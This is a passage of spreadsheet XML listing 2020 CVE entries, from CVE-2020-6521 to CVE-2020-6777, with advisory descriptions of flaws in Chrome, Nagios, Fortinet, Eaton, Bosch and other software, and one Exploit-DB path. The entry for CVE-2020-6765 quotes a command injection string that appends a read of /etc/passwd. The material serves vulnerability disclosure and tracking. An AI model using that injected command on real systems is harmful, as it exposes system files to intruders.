  <si>
    <t>Buffer overflow in Skia in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6521</t>
  </si>
  <si>
    <t>Side-channel information leakage in autofill in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6522</t>
  </si>
  <si>
    <t>Inappropriate implementation in external protocol handlers in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6523</t>
  </si>
  <si>
    <t>Out of bounds write in Skia in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6524</t>
  </si>
  <si>
    <t>Heap buffer overflow in WebAudio in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6525</t>
  </si>
  <si>
    <t>Heap buffer overflow in Skia in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6526</t>
  </si>
  <si>
    <t>Inappropriate implementation in iframe sandbox in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6527</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in CSP in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to bypass content security policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6528</t>
  </si>
  <si>
    <t>Incorrect security UI in basic auth in Google Chrome on iOS prior to 84.0.4147.89 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6529</t>
  </si>
  <si>
    <t>Inappropriate implementation in WebRTC in Google Chrome prior to 84.0.4147.89 allowed an attacker in a privileged network position to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6530</t>
  </si>
  <si>
    <t>Out of bounds memory access in developer tools in Google Chrome prior to 84.0.4147.89 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6531</t>
  </si>
  <si>
    <t>Side-channel information leakage in scroll to text in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6532</t>
  </si>
  <si>
    <t>Use after free in SCTP in Google Chrome prior to 84.0.4147.105 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6533</t>
  </si>
  <si>
    <t>CVE-2020-6534</t>
  </si>
  <si>
    <t>Heap buffer overflow in WebRTC in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6535</t>
  </si>
  <si>
    <t>Insufficient data validation in WebUI in Google Chrome prior to 84.0.4147.89 allowed a remote attacker who had compromised the renderer process to inject scripts or HTML into a privileged page via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6536</t>
  </si>
  <si>
    <t>Incorrect security UI in PWAs in Google Chrome prior to 84.0.4147.89 allowed a remote attacker who had persuaded the user to install a PWA to spoof the contents of the Omnibox (URL bar) via a crafted PWA.</t>
  </si>
  <si>
    <t>CVE-2020-6537</t>
  </si>
  <si>
    <t>Type confusion in V8 in Google Chrome prior to 84.0.4147.105 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6538</t>
  </si>
  <si>
    <t>Inappropriate implementation in WebView in Google Chrome on Android prior to 84.0.4147.105 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6539</t>
  </si>
  <si>
    <t>Use after free in CSS in Google Chrome prior to 84.0.4147.105 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6540</t>
  </si>
  <si>
    <t>Buffer overflow in Skia in Google Chrome prior to 84.0.4147.105 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6541</t>
  </si>
  <si>
    <t>Use after free in WebUSB in Google Chrome prior to 84.0.4147.105 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6542</t>
  </si>
  <si>
    <t>Use after free in ANGLE in Google Chrome prior to 84.0.4147.125 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6543</t>
  </si>
  <si>
    <t>Use after free in task scheduling in Google Chrome prior to 84.0.4147.125 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6544</t>
  </si>
  <si>
    <t>Use after free in media in Google Chrome prior to 84.0.4147.125 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6545</t>
  </si>
  <si>
    <t>Use after free in audio in Google Chrome prior to 84.0.4147.125 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6546</t>
  </si>
  <si>
    <t>Inappropriate implementation in installer in Google Chrome prior to 84.0.4147.125 allowed a local attacker to potentially elevate privilege via a crafted filesystem.</t>
  </si>
  <si>
    <t>CVE-2020-6547</t>
  </si>
  <si>
    <t>Incorrect security UI in media in Google Chrome prior to 84.0.4147.125 allowed a remote attacker to potentially obtain sensitive information via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6548</t>
  </si>
  <si>
    <t>Heap buffer overflow in Skia in Google Chrome prior to 84.0.4147.125 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6549</t>
  </si>
  <si>
    <t>CVE-2020-6550</t>
  </si>
  <si>
    <t>Use after free in IndexedDB in Google Chrome prior to 84.0.4147.125 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6551</t>
  </si>
  <si>
    <t>Use after free in WebXR in Google Chrome prior to 84.0.4147.125 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6552</t>
  </si>
  <si>
    <t>Use after free in Blink in Google Chrome prior to 84.0.4147.125 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6553</t>
  </si>
  <si>
    <t>Use after free in offline mode in Google Chrome on iOS prior to 84.0.4147.125 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6554</t>
  </si>
  <si>
    <t>Use after free in extensions in Google Chrome prior to 84.0.4147.125 allowed a remote attacker to potentially perform a sandbox escape via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-6555</t>
  </si>
  <si>
    <t>Out of bounds read in WebGL in Google Chrome prior to 84.0.4147.125 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-6556</t>
  </si>
  <si>
    <t>Heap buffer overflow in SwiftShader in Google Chrome prior to 84.0.4147.135 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6557</t>
  </si>
  <si>
    <t>Inappropriate implementation in networking in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to perform domain spoofing via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6558</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in iOSWeb in Google Chrome on iOS prior to 85.0.4183.83 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6559</t>
  </si>
  <si>
    <t>Use after free in presentation API in Google Chrome prior to 85.0.4183.83 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6560</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in autofill in Google Chrome prior to 85.0.4183.83 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6561</t>
  </si>
  <si>
    <t>Inappropriate implementation in Content Security Policy in Google Chrome prior to 85.0.4183.83 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6562</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in Blink in Google Chrome prior to 85.0.4183.83 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6563</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in intent handling in Google Chrome on Android prior to 85.0.4183.83 allowed a remote attacker to obtain potentially sensitive information from disk via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6564</t>
  </si>
  <si>
    <t>Inappropriate implementation in permissions in Google Chrome prior to 85.0.4183.83 allowed a remote attacker to spoof the contents of a permission dialog via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6565</t>
  </si>
  <si>
    <t>Inappropriate implementation in Omnibox in Google Chrome on iOS prior to 85.0.4183.83 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6566</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in media in Google Chrome prior to 85.0.4183.83 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6567</t>
  </si>
  <si>
    <t>Insufficient validation of untrusted input in command line handling in Google Chrome on Windows prior to 85.0.4183.83 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6568</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in intent handling in Google Chrome on Android prior to 85.0.4183.83 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6569</t>
  </si>
  <si>
    <t>Integer overflow in WebUSB in Google Chrome prior to 85.0.4183.83 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6570</t>
  </si>
  <si>
    <t>Information leakage in WebRTC in Google Chrome prior to 85.0.4183.83 allowed a remote attacker to obtain potentially sensitive information via a crafted WebRTC interaction.</t>
  </si>
  <si>
    <t>CVE-2020-6571</t>
  </si>
  <si>
    <t>Insufficient data validation in Omnibox in Google Chrome prior to 85.0.4183.83 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name.</t>
  </si>
  <si>
    <t>CVE-2020-6572</t>
  </si>
  <si>
    <t>Use after free in Media in Google Chrome prior to 81.0.4044.92 allowed a remote attacker to execute arbitrary code via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6573</t>
  </si>
  <si>
    <t>Use after free in video in Google Chrome on Android prior to 85.0.4183.102 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6574</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in installer in Google Chrome on OS X prior to 85.0.4183.102 allowed a local attacker to potentially achieve privilege escalation via a crafted binary.</t>
  </si>
  <si>
    <t>CVE-2020-6575</t>
  </si>
  <si>
    <t>Race in Mojo in Google Chrome prior to 85.0.4183.102 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6576</t>
  </si>
  <si>
    <t>Use after free in offscreen canvas in Google Chrome prior to 85.0.4183.102 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-6577</t>
  </si>
  <si>
    <t>The IT-Recht Kanzlei plugin in Zen Cart 1.5.6c (German edition) allows itrk-api.php rechtstext_language SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-6578</t>
  </si>
  <si>
    <t>Zen Cart 1.5.6d allows reflected XSS via the main_page parameter to includes/templates/template_default/common/tpl_main_page.php or includes/templates/responsive_classic/common/tpl_main_page.php.</t>
  </si>
  <si>
    <t>CVE-2020-6579</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in mailhive/cloudbeez/cloudloader.php and mailhive/cloudbeez/cloudloader_core.php in the MailBeez plugin for ZenCart before 3.9.22 allows remote attackers to inject arbitrary web script or HTML via the cloudloader_mode parameter.</t>
  </si>
  <si>
    <t>CVE-2020-6581</t>
  </si>
  <si>
    <t>Nagios NRPE 3.2.1 has Insufficient Filtering because, for example, nasty_metachars interprets \n as the character \ and the character n (not as the \n newline sequence). This can cause command injection.</t>
  </si>
  <si>
    <t>CVE-2020-6582</t>
  </si>
  <si>
    <t>Nagios NRPE 3.2.1 has a Heap-Based Buffer Overflow, as demonstrated by interpretation of a small negative number as a large positive number during a bzero call.</t>
  </si>
  <si>
    <t>CVE-2020-6583</t>
  </si>
  <si>
    <t>BigProf Online Invoicing System (OIS) through 2.6 has XSS that can be leveraged for session hijacking. An attacker can exploit the XSS vulnerability, retrieve the session cookie from the administrator login, and take over the administrator account via the Name field in an Add New Client action.</t>
  </si>
  <si>
    <t>CVE-2020-6584</t>
  </si>
  <si>
    <t>Nagios Log Server 2.1.3 has Incorrect Access Control.</t>
  </si>
  <si>
    <t>CVE-2020-6585</t>
  </si>
  <si>
    <t>Nagios Log Server 2.1.3 has CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-6586</t>
  </si>
  <si>
    <t>Nagios Log Server 2.1.3 allows XSS by visiting /profile and entering a crafted name field that is mishandled on the /admin/users page. Any malicious user with limited access can store an XSS payload in his Name. When any admin views this, the XSS is triggered.</t>
  </si>
  <si>
    <t>CVE-2020-6590</t>
  </si>
  <si>
    <t>Forcepoint Web Security Content Gateway versions prior to 8.5.4 improperly process XML input, leading to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6609</t>
  </si>
  <si>
    <t>GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in read_pages_map in decode_r2007.c.</t>
  </si>
  <si>
    <t>CVE-2020-6610</t>
  </si>
  <si>
    <t>GNU LibreDWG 0.9.3.2564 has an attempted excessive memory allocation in read_sections_map in decode_r2007.c.</t>
  </si>
  <si>
    <t>CVE-2020-6611</t>
  </si>
  <si>
    <t>GNU LibreDWG 0.9.3.2564 has a NULL pointer dereference in get_next_owned_entity in dwg.c.</t>
  </si>
  <si>
    <t>CVE-2020-6612</t>
  </si>
  <si>
    <t>GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in copy_compressed_bytes in decode_r2007.c.</t>
  </si>
  <si>
    <t>CVE-2020-6613</t>
  </si>
  <si>
    <t>GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in bit_search_sentinel in bits.c.</t>
  </si>
  <si>
    <t>CVE-2020-6614</t>
  </si>
  <si>
    <t>GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in bfr_read in decode.c.</t>
  </si>
  <si>
    <t>CVE-2020-6615</t>
  </si>
  <si>
    <t>GNU LibreDWG 0.9.3.2564 has an invalid pointer dereference in dwg_dynapi_entity_value in dynapi.c (dynapi.c is generated by gen-dynapi.pl).</t>
  </si>
  <si>
    <t>CVE-2020-6616</t>
  </si>
  <si>
    <t>Some Broadcom chips mishandle Bluetooth random-number generation because a low-entropy Pseudo Random Number Generator (PRNG) is used in situations where a Hardware Random Number Generator (HRNG) should have been used to prevent spoofing. This affects, for example, Samsung Galaxy S8, S8+, and Note8 devices with the BCM4361 chipset. The Samsung ID is SVE-2020-16882 (May 2020).</t>
  </si>
  <si>
    <t>CVE-2020-6617</t>
  </si>
  <si>
    <t>stb stb_truetype.h through 1.22 has an assertion failure in stbtt__cff_int.</t>
  </si>
  <si>
    <t>CVE-2020-6618</t>
  </si>
  <si>
    <t>stb stb_truetype.h through 1.22 has a heap-based buffer over-read in stbtt__find_table.</t>
  </si>
  <si>
    <t>CVE-2020-6619</t>
  </si>
  <si>
    <t>stb stb_truetype.h through 1.22 has an assertion failure in stbtt__buf_seek.</t>
  </si>
  <si>
    <t>CVE-2020-6620</t>
  </si>
  <si>
    <t>stb stb_truetype.h through 1.22 has a heap-based buffer over-read in stbtt__buf_get8.</t>
  </si>
  <si>
    <t>CVE-2020-6621</t>
  </si>
  <si>
    <t>stb stb_truetype.h through 1.22 has a heap-based buffer over-read in ttUSHORT.</t>
  </si>
  <si>
    <t>CVE-2020-6622</t>
  </si>
  <si>
    <t>stb stb_truetype.h through 1.22 has a heap-based buffer over-read in stbtt__buf_peek8.</t>
  </si>
  <si>
    <t>CVE-2020-6623</t>
  </si>
  <si>
    <t>stb stb_truetype.h through 1.22 has an assertion failure in stbtt__cff_get_index.</t>
  </si>
  <si>
    <t>CVE-2020-6624</t>
  </si>
  <si>
    <t>jhead through 3.04 has a heap-based buffer over-read in process_DQT in jpgqguess.c.</t>
  </si>
  <si>
    <t>CVE-2020-6625</t>
  </si>
  <si>
    <t>jhead through 3.04 has a heap-based buffer over-read in Get32s when called from ProcessGpsInfo in gpsinfo.c.</t>
  </si>
  <si>
    <t>CVE-2020-6628</t>
  </si>
  <si>
    <t>Ming (aka libming) 0.4.8 has a heap-based buffer over-read in the function decompile_SWITCH() in decompile.c.</t>
  </si>
  <si>
    <t>CVE-2020-6629</t>
  </si>
  <si>
    <t>Ming (aka libming) 0.4.8 has z NULL pointer dereference in the function decompileGETURL2() in decompile.c.</t>
  </si>
  <si>
    <t>CVE-2020-6630</t>
  </si>
  <si>
    <t>An issue was discovered in GPAC version 0.8.0. There is a NULL pointer dereference in the function gf_isom_get_media_data_size() in isomedia/isom_read.c.</t>
  </si>
  <si>
    <t>CVE-2020-6631</t>
  </si>
  <si>
    <t>An issue was discovered in GPAC version 0.8.0. There is a NULL pointer dereference in the function gf_m2ts_stream_process_pmt() in media_tools/m2ts_mux.c.</t>
  </si>
  <si>
    <t>CVE-2020-6632</t>
  </si>
  <si>
    <t>In PrestaShop 1.7.6.2, XSS can occur during addition or removal of a QuickAccess link. This is related to AdminQuickAccessesController.php, themes/default/template/header.tpl, and themes/new-theme/js/header.js.</t>
  </si>
  <si>
    <t>CVE-2020-6637</t>
  </si>
  <si>
    <t>openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.</t>
  </si>
  <si>
    <t>CVE-2020-6638</t>
  </si>
  <si>
    <t>Grin through 2.1.1 has Insufficient Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6640</t>
  </si>
  <si>
    <t>An improper neutralization of input vulnerability in the Admin Profile of FortiAnalyzer may allow a remote authenticated attacker to perform a stored cross site scripting attack (XSS) via the Description Area.</t>
  </si>
  <si>
    <t>CVE-2020-6641</t>
  </si>
  <si>
    <t>Two authorization bypass through user-controlled key vulnerabilities in the Fortinet FortiPresence 2.1.0 administration interface may allow an attacker to gain access to some user data via portal manager or portal users parameters.</t>
  </si>
  <si>
    <t>CVE-2020-6643</t>
  </si>
  <si>
    <t>An improper neutralization of input vulnerability in the URL Description in Fortinet FortiIsolator version 1.2.2 allows a remote authenticated attacker to perform a cross site scripting attack (XSS).</t>
  </si>
  <si>
    <t>CVE-2020-6644</t>
  </si>
  <si>
    <t>An insufficient session expiration vulnerability in FortiDeceptor 3.0.0 and below allows an attacker to reuse the unexpired admin user session IDs to gain admin privileges, should the attacker be able to obtain that session ID via other, hypothetical attacks.</t>
  </si>
  <si>
    <t>CVE-2020-6646</t>
  </si>
  <si>
    <t>An improper neutralization of input vulnerability in FortiWeb allows a remote authenticated attacker to perform a stored cross site scripting attack (XSS) via the Disclaimer Description of a Replacement Message.</t>
  </si>
  <si>
    <t>CVE-2020-6647</t>
  </si>
  <si>
    <t>An improper neutralization of input vulnerability in the dashboard of FortiADC may allow an authenticated attacker to perform a cross site scripting attack (XSS) via the name parameter.</t>
  </si>
  <si>
    <t>CVE-2020-6648</t>
  </si>
  <si>
    <t>A cleartext storage of sensitive information vulnerability in FortiOS command line interface in versions 6.2.4 and earlier and FortiProxy 2.0.0, 1.2.9 and earlier may allow an authenticated attacker to obtain sensitive information such as users passwords by connecting to FortiGate CLI and executing the "diag sys ha checksum show" command.</t>
  </si>
  <si>
    <t>CVE-2020-6649</t>
  </si>
  <si>
    <t>An insufficient session expiration vulnerability in FortiNet's FortiIsolator version 2.0.1 and below may allow an attacker to reuse the unexpired admin user session IDs to gain admin privileges, should the attacker be able to obtain that session ID (via other, hypothetical attacks)</t>
  </si>
  <si>
    <t>CVE-2020-6650</t>
  </si>
  <si>
    <t>UPS companion software v1.05 &amp; Prior is affected by ‘Eval Injection’ vulnerability. The software does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call e.g.”eval” in “Update Manager” class when software attempts to see if there are updates available. This results in arbitrary code execution on the machine where software is installed.</t>
  </si>
  <si>
    <t>CVE-2020-6651</t>
  </si>
  <si>
    <t>Improper Input Validation in Eaton's Intelligent Power Manager (IPM) v 1.67 &amp; prior on file name during configuration file import functionality allows attackers to perform command injection or code execution via specially crafted file names while uploading the configuration file in the application.</t>
  </si>
  <si>
    <t>CVE-2020-6652</t>
  </si>
  <si>
    <t>Incorrect Privilege Assignment vulnerability in Eaton's Intelligent Power Manager (IPM) v1.67 &amp; prior allow non-admin users to upload the system configuration files by sending specially crafted requests. This can result in non-admin users manipulating the system configurations via uploading the configurations with incorrect parameters.</t>
  </si>
  <si>
    <t>CVE-2020-6653</t>
  </si>
  <si>
    <t>Eaton's Secure connect mobile app v1.7.3 &amp; prior stores the user login credentials in logcat file when user create or register the account on the Mobile app. A malicious app or unauthorized user can harvest the information and later on can use the information to monitor and control the user's account and associated devices.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-6654</t>
  </si>
  <si>
    <t>A DLL Hijacking vulnerability in Eaton's 9000x Programming and Configuration Software v 2.0.38 and prior allows an attacker to execute arbitrary code by replacing the required DLLs with malicious DLLs when the software try to load vci11un6.DLL and cinpl.DLL.</t>
  </si>
  <si>
    <t>CVE-2020-6655</t>
  </si>
  <si>
    <t>The Eaton's easySoft software v7.xx prior to v7.22 are susceptible to Out-of-bounds remote code execution vulnerability. A malicious entity can execute a malicious code or make the application crash by tricking user to upload the malformed .E70 file in the application. The vulnerability arises due to improper validation and parsing of the E70 file content by the application.</t>
  </si>
  <si>
    <t>CVE-2020-6656</t>
  </si>
  <si>
    <t>Eaton's easySoft software v7.xx prior to v7.22 are susceptible to file parsing type confusion remote code execution vulnerability. A malicious entity can execute a malicious code or make the application crash by tricking user upload a malformed .E70 file in the application. The vulnerability arises due to improper validation of user data supplied through E70 file which is causing Type Confusion.</t>
  </si>
  <si>
    <t>CVE-2020-6750</t>
  </si>
  <si>
    <t>GSocketClient in GNOME GLib through 2.62.4 may occasionally connect directly to a target address instead of connecting via a proxy server when configured to do so, because the proxy_addr field is mishandled. This bug is timing-dependent and may occur only sporadically depending on network delays. The greatest security relevance is in use cases where a proxy is used to help with privacy/anonymity, even though there is no technical barrier to a direct connection. NOTE: versions before 2.60 are unaffected.</t>
  </si>
  <si>
    <t>CVE-2020-6752</t>
  </si>
  <si>
    <t>In OMERO before 5.6.1, group owners can access members' data in other groups.</t>
  </si>
  <si>
    <t>CVE-2020-6753</t>
  </si>
  <si>
    <t>The Login by Auth0 plugin before 4.0.0 for WordPress allows stored XSS on multiple pages, a different issue than CVE-2020-5392.</t>
  </si>
  <si>
    <t>CVE-2020-6754</t>
  </si>
  <si>
    <t>dotCMS before 5.2.4 is vulnerable to directory traversal, leading to incorrect access control. It allows an attacker to read or execute files under $TOMCAT_HOME/webapps/ROOT/assets (which should be a protected directory). Additionally, attackers can upload temporary files (e.g., .jsp files) into /webapps/ROOT/assets/tmp_upload, which can lead to remote command execution (with the permissions of the user running the dotCMS application).</t>
  </si>
  <si>
    <t>CVE-2020-6756</t>
  </si>
  <si>
    <t>languageOptions.php in Rasilient PixelStor 5000 K:4.0.1580-20150629 (KDI Version) allows unauthenticated attackers to remotely execute code via the lang parameter.</t>
  </si>
  <si>
    <t>exploits/php/webapps/47899.py</t>
  </si>
  <si>
    <t>PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-6757</t>
  </si>
  <si>
    <t>contentHostProperties.php in Rasilient PixelStor 5000 K:4.0.1580-20150629 (KDI Version) allows authenticated attackers to remotely execute code via the name parameter.</t>
  </si>
  <si>
    <t>CVE-2020-6758</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in Option/optionsAll.php in Rasilient PixelStor 5000 K:4.0.1580-20150629 (KDI Version) allows remote attackers to inject arbitrary web script or HTML via the ContentFrame parameter.</t>
  </si>
  <si>
    <t>CVE-2020-6760</t>
  </si>
  <si>
    <t>Schmid ZI 620 V400 VPN 090 routers allow an attacker to execute OS commands as root via shell metacharacters to an entry on the SSH subcommand menu, as demonstrated by ping.</t>
  </si>
  <si>
    <t>CVE-2020-6765</t>
  </si>
  <si>
    <t>D-Link DSL-GS225 J1 AU_1.0.4 devices allow an admin to execute OS commands by placing shell metacharacters after a supported CLI command, as demonstrated by ping -c1 127.0.0.1; cat/etc/passwd. The CLI is reachable by TELNET.</t>
  </si>
  <si>
    <t>CVE-2020-6767</t>
  </si>
  <si>
    <t>A path traversal vulnerability in the Bosch Video Management System (BVMS) FileTransferService allows an authenticated remote attacker to read arbitrary files from the Central Server. This affects Bosch BVMS versions 10.0 &lt;= 10.0.0.1225, 9.0 &lt;= 9.0.0.827, 8.0 &lt;= 8.0.329 and 7.5 and older. This affects Bosch BVMS Viewer versions 10.0 &lt;= 10.0.0.1225, 9.0 &lt;= 9.0.0.827, 8.0 &lt;= 8.0.329 and 7.5 and older. This affects Bosch DIVAR IP 3000, DIVAR IP 7000 and DIVAR IP all-in-one 5000 if a vulnerable BVMS version is installed.</t>
  </si>
  <si>
    <t>CVE-2020-6768</t>
  </si>
  <si>
    <t>A path traversal vulnerability in the Bosch Video Management System (BVMS) NoTouch deployment allows an unauthenticated remote attacker to read arbitrary files from the Central Server. This affects Bosch BVMS versions 10.0 &lt;= 10.0.0.1225, 9.0 &lt;= 9.0.0.827, 8.0 &lt;= 8.0.329 and 7.5 and older. This affects Bosch BVMS Viewer versions 10.0 &lt;= 10.0.0.1225, 9.0 &lt;= 9.0.0.827, 8.0 &lt;= 8.0.329 and 7.5 and older. This affects Bosch DIVAR IP 3000, DIVAR IP 7000 and DIVAR IP all-in-one 5000 if a vulnerable BVMS version is installed.</t>
  </si>
  <si>
    <t>CVE-2020-6769</t>
  </si>
  <si>
    <t>Missing Authentication for Critical Function in the Bosch Video Streaming Gateway (VSG) allows an unauthenticated remote attacker to retrieve and set arbitrary configuration data of the Video Streaming Gateway. A successful attack can impact the confidentiality and availability of live and recorded video data of all cameras configured to be controlled by the VSG as well as the recording storage associated with the VSG. This affects Bosch Video Streaming Gateway versions 6.45 &lt;= 6.45.08, 6.44 &lt;= 6.44.022, 6.43 &lt;= 6.43.0023 and 6.42.10 and older. This affects Bosch DIVAR IP 3000, DIVAR IP 7000 and DIVAR IP all-in-one 5000 if a vulnerable VSG version is installed with BVMS. This affects Bosch DIVAR IP 2000 &lt;= 3.62.0019 and DIVAR IP 5000 &lt;= 3.80.0039 if the corresponding port 8023 has been opened in the device's firewall.</t>
  </si>
  <si>
    <t>CVE-2020-6770</t>
  </si>
  <si>
    <t>Deserialization of Untrusted Data in the BVMS Mobile Video Service (BVMS MVS) allows an unauthenticated remote attacker to execute arbitrary code on the system. This affects Bosch BVMS versions 10.0 &lt;= 10.0.0.1225, 9.0 &lt;= 9.0.0.827, 8.0 &lt;= 8.0.0.329 and 7.5 and older. This affects Bosch DIVAR IP 3000 and DIVAR IP 7000 if a vulnerable BVMS version is installed.</t>
  </si>
  <si>
    <t>CVE-2020-6771</t>
  </si>
  <si>
    <t>Loading a DLL through an Uncontrolled Search Path Element in Bosch IP Helper up to and including version 1.00.0008 potentially allows an attacker to execute arbitrary code on a victim's system. A prerequisite is that the victim is tricked into placing a malicious DLL in the same application directory as the portable IP Helper application.</t>
  </si>
  <si>
    <t>CVE-2020-6774</t>
  </si>
  <si>
    <t>Improper Access Control in the Kiosk Mode functionality of Bosch Recording Station allows a local unauthenticated attacker to escape from the Kiosk Mode and access the underlying operating system.</t>
  </si>
  <si>
    <t>CVE-2020-6776</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Bosch PRAESIDEO until and including version 4.41 and Bosch PRAESENSA until and including version 1.10 allows an unauthenticated remote attacker to trigger actions on an affected system on behalf of another user (Cross-Site Request Forgery). This requires the victim to be tricked into clicking a malicious link or submitting a malicious form. A successful exploit allows the attacker to perform arbitrary actions with the privileges of the victim, e.g. creating and modifying user accounts, changing system configuration settings and cause DoS conditions. Note: For Bosch PRAESIDEO 4.31 and newer and Bosch PRAESENSA in all versions, the confidentiality impact is considered low because user credentials are not shown in the web interface.</t>
  </si>
  <si>
    <t>CVE-2020-6777</t>
  </si>
  <si>
